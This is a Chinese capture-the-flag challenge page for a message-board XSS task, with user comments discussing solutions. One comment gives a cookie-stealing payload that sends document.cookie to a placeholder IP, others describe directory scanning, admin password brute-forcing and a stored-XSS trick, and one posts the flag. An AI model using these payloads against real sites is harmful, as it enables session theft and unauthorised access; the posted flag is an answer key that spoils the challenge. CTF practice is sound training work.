留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一血奖励: 5金币
解  决: 3420
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
评论
19881191586 2年前

第一步:用御剑或dirsearch扫描后台,发现index.php和admin.php 第二步:用工具爆破admin的登录密码 第三步:进入admin页面,刷新页面,弹出提示,提示里面出现URL编码后的flag 第四步:URL解码

回复 3

treasure11 2年前

....太难了

回复 0

mAns0nw0W 2年前

flag{0d25978069e52fed99591c5c19ca0663}

回复 0

APTX4869ZRC 2年前

BugKu真的很酷

回复 0

Warm2pPing 2年前

提示:需要xss平台接收flag 那就是自己找一个XSS平台咯~ 然后开始注入 大概是平台地址加上 ?cookie=+document.cookie 没时间了自己拼接吧

回复 0

kanljk 2年前

<svg onload="window.open('http://IP/'+document.cookie)">

回复 0

XRain 2年前

思路想错了,我一直在测试前台留言的XSS,前台留言时在 [img][/img] 之间插入超长字符串,就会导致 img 标签的 src 属性的双引号没有闭合,直到再次留言时插入的 [img][/img] 才闭合,所以可以给后一次留言中的 img 标签注入 onerror 属性及其 js 代码,最终导致前台存储型 XSS。不过,我离题了,白白浪费了半天的时间。

回复 0

18363158240 2年前

小括号被转成‘|’了,xss漏洞被修复了

回复 0

老渡真的不懂 2年前

有大佬能看一下吗,注入代码XSS平台怎么都接收不到,结果去爆admin的密码登录后就接收到了。。。。。

回复 3

laodao 2年前

这个题有问题吧 必须要登录admin.php才可以看到flag,admin密码不是弱密码

回复 2
qfgk16 11月前

@harry xss回显不了

回复 0

harry 管理员 2年前

不需要登录

回复 0

WriteUp

image
丶我亚索贼六

5 金币

评分(19)

解题动态

cenyo 攻破了该题 3小时前
billy856 攻破了该题 1天前
fi1y 攻破了该题 4天前
imhacker 攻破了该题 4天前
曦羽 攻破了该题 6天前
等往事风中吹‘ 攻破了该题 6天前
dwx386572657 攻破了该题 7天前
luobosir 攻破了该题 7天前
WW12@ 攻破了该题 8天前
ChatFaro 攻破了该题 8天前
1546546 攻破了该题 9天前
一世温华 攻破了该题 11天前
hull-p 攻破了该题 14天前
凯哥 攻破了该题 15天前
lvchijing 攻破了该题 15天前
baizhi白栀 攻破了该题 16天前
星落. 攻破了该题 17天前
13822005976 攻破了该题 17天前
heting 攻破了该题 21天前
店晓贰 攻破了该题 23天前
问题反馈